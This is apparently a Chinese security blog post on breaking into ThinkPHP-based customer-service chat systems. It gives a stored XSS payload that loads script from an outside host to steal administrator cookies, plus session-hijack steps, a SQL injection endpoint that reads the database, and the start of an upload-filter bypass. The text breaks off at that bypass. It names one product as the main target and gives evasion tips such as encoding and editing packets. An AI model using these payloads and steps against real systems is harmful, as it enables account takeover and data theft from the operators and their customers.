破解某客服系统的新策略
专注于网络安全领域,跟踪漏洞动态,深耕互联网,做一个深谙攻防之道的公众号。
同时涉足多个领域,是哲学,抑或是文学与艺术,关注金融市场,研究全球市场经济发展方向。
这套客服系统是基于ThinkPHP开发的,并且经过了几个版本的演变。
1.小马PHP客服系统:这套系统应该是最早的,但是现在资产很少了。
2.迎客PHP客服系统:这个应该是某个小团队改改版权就用了的。
3.来客PHP客服系统
资产最多,成为主要攻击目标。
4.好客PHP客服系统
......
其实这些客服系统都大同小异,但是漏洞有一些区别,有的有,有的没有。
源码获取:关注公众号发送“客服系统”。
2023年03月22日更新:
获取源码之前我建议您先阅读下面这一篇文章的结尾。
传送门:https://mp.weixin.qq.com/s/gb6HCD2n5RILlmRIqh_GVA
如果您是我在文章里说的歪瓜裂枣,那么请你选择以下方式获取源码。
百度搜索:“ThinkPHP客服系统”或“ThinkPHP客服系统”
安装教程请参考以下链接:
https://www.kancloud.cn/longlong52201/tp5_phpkefu/2244116/
https://blog.****.net/weixin_52154971/article/details/118999542
漏洞位置:/admin/event/chat
漏洞危害:获取在线客服权限
XSS_Payload:
<a href= hidden></a>测试<script src=//test.xss/xss1></script>
收到管理员Cookie
利用插件替换Cookie
访问:/admin/index/chats.html
该XSS漏洞不是每套客服系统都有,有些会被过滤。有时候会过滤中文,可以经过编码再发包。
还有,有时候能打到管理系统的Cookie,可以直接获得所有客服系统的管理权限,右上角位置返回系统即可。
直接发送Payload是没有效果的,需要改包发送。
漏洞位置:/admin/event/getwaitnum
漏洞危害:读取数据库内容
可以参考珂师傅的文章,这里不再细说。传送门:温故而知新,老系统挖老漏洞
漏洞位置:/admin/event/uploadimg
校验类型:黑名单验证
绕过方法: